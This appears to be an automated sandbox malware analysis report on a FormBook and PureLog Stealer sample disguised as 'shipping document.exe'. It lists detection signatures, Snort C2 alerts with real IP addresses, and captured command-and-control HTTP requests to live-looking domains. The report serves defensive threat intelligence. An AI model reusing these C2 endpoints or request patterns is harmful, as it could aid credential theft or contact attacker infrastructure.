Windows Analysis Report
shipping document.exe

Overview

General Information

Sample name:	shipping document.exe
Analysis ID:	1430793
MD5:	180165361384e56db00389733f0c54f5
SHA1:	1d48e601e3ba392fafde82b4a7fc0a39fba0a382
SHA256:	48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
Tags:	exe
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: shipping document.exe	ReversingLabs: Detection: 23%
Source: shipping document.exe	Virustotal: Detection: 35%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: shipping document.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: shipping document.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: shipping document.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: OpnFiles.pdb source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oWRaEnEJAq.exe, 00000006.00000002.4109844179.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp, oWRaEnEJAq.exe, 00000008.00000000.2100219438.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping document.exe, shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: OpnFiles.pdbGCTL source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\openfiles.exe

Code function: 7_2_027AB970 FindFirstFileW,FindNextFileW,FindClose,

7_2_027AB970

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\openfiles.exe

Code function: 4x nop then xor eax, eax

7_2_027993B0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49740 -> 80.240.20.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 157.7.107.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 157.7.107.63:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 157.7.107.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.217.16.36:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.217.16.36:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.217.16.36:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.46.103:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.46.103:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 203.161.46.103:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 162.240.81.18:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 162.240.81.18:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 162.240.81.18:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 217.160.0.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49766 -> 118.27.122.214:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49767 -> 118.27.122.214:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 118.27.122.214:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49770 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49771 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49774 -> 31.186.11.254:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49775 -> 31.186.11.254:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 31.186.11.254:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49778 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49779 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49781 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49782 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49783 -> 91.195.240.19:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View	IP Address: 64.190.62.22 64.190.62.22

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE= HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX HTTP/1.1Host: www.mz3fk6g3.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18= HTTP/1.1Host: www.heldhold.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX HTTP/1.1Host: www.tavernadoheroi.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q= HTTP/1.1Host: www.carliente.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX HTTP/1.1Host: www.paydayloans3.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=NDJWYY+b4MJOe0SOZhyP3/gD5HDsZQ87d1VJjuxPOAPtwNnLRfPhezVGmkxSEIZ/YXBHCU3m0ogYj5Dd6IJsMpuoncQuveGk65BlZhCiT7/R0prs9m7zKG0= HTTP/1.1Host: www.kansaiwoody.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX HTTP/1.1Host: www.corvidemporium.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4= HTTP/1.1Host: www.levelstep.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX HTTP/1.1Host: www.brothedboil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Source: unknown

DNS traffic detected: queries for: www.jthzbrdb.fun

Source: unknown

HTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 31 32 6c 34 32 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 52 70 49 64 46 53 55 41 66 36 70 74 45 38 77 4c 49 37 46 2f 78 77 2f 59 53 64 4a 7a 45 56 4d 62 4f 67 3d 3d Data Ascii: 12l42=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpRpIdFSUAf6ptE8wLI7F/xw/YSdJzEVMbOg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:26:07 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:26:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 